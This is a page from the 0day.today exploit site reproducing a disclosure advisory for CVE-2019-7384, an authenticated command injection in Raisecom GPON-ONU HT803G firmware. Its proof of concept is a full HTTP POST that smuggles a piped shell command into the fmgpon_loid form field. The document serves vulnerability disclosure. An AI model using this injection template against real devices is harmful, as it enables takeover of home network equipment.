0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Raisecom Technology GPON-ONU HT803G-07 Command Injection (1)
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Raisecom Technology GPON-ONU HT803G-07 Command Injection (1) ===================================== Authenticated Shell Command Injection ===================================== . contents:: Table Of Content Overview ======== Title:- Authenticated Shell command Injection Author: Kaustubh G. Padwad CVE ID: CVE-2019-7384. Vendor: Raisecom technology co.,LTD Product: GPON-ONU HT803G-07 (could be more who shares the same codebase) Potentially vulnerable ISCOM HT803G-U ISCOM HT803G-W ISCOM HT803G-1GE ISCOM HT803G Tested Version: : ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 Severity: High--Critical Advisory ID ============ KSA-Dev-005 About the Product: ================== The Raisecom GPON optical network terminal (ONT) series provides a flexible mix of residential access services including high speed data, IPTV, voice and CATV services compliant with the ITU-T G.984 standard. In particular, the Raisecom ONUs are designed for Ethernet data services, voice over IP, IPTV, CATV, wireless router accessing and convenient USB2.0 home network storage connections for various application scenarios, such as residential triple-play service and business connections. The GPON ONT series offer flexible choices in terms of downlink types and numbers, such as, GE/FE auto-adapting Ethernet ports, POTS (FXS) interfaces, RF port and WiFi function compliant with IEEE 802.11b/g/n. All GPON FTTX ONUs offer advanced end-to-end management and monitoring functionality, and the GPON series can be managed under the Raisecom NView platform. Description: ============ An authenticated shell command injection issue has been discovered in Raisecom ISCOM HT803G-U, HT803G-W, HT803G-1GE, and HT803G GPON products with the firmware version ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 or below. The value of the fmgpon_loid parameter is used in a system call inside the boa binary. Because there is no user input validation, this leads to authenticated code execution on the device. Additional_information ====================== The value of fmgpon_loid parameter is parse to system call in implimentation of application code inside boa binary and since their is no user input validation this leads to authenticated code execution on device Vulnerability Class: ==================== Authenticated Shell Command Injection Attack Type =========== Local Impact Code execution ===================== true Attack Vectors ============== To exploit this vulnerability one must have to visit the crafted page or have to parse the proper crafted request to the device How to Reproduce: (POC): ======================== POST /boaform/admin/formgponConf HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/gpon.asp Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 162 fmgpon_loid=%7c%20ping%20-n%2013%20127%2e0%2e0%2e1%20%7c&fmgpon_loid_password=raisecom&fmgpon_ploam_password=1234567890&apply=Apply+Changes&submit-url=%2Fgpon.asp Mitigation ========== This issue is fixed in latest firmware as per vendor. Disclosure: =========== 28-NOV-2018 Discoverd the Vulnerability 28-NOV-2018 Reported to vendor 10-Dec-2018 Recived confirmation from vendor regarding fix 04-JAN-2019 Request for the CVE-ID 04-FEB-2018: CVE assigned # 0day.today [2024-11-15] #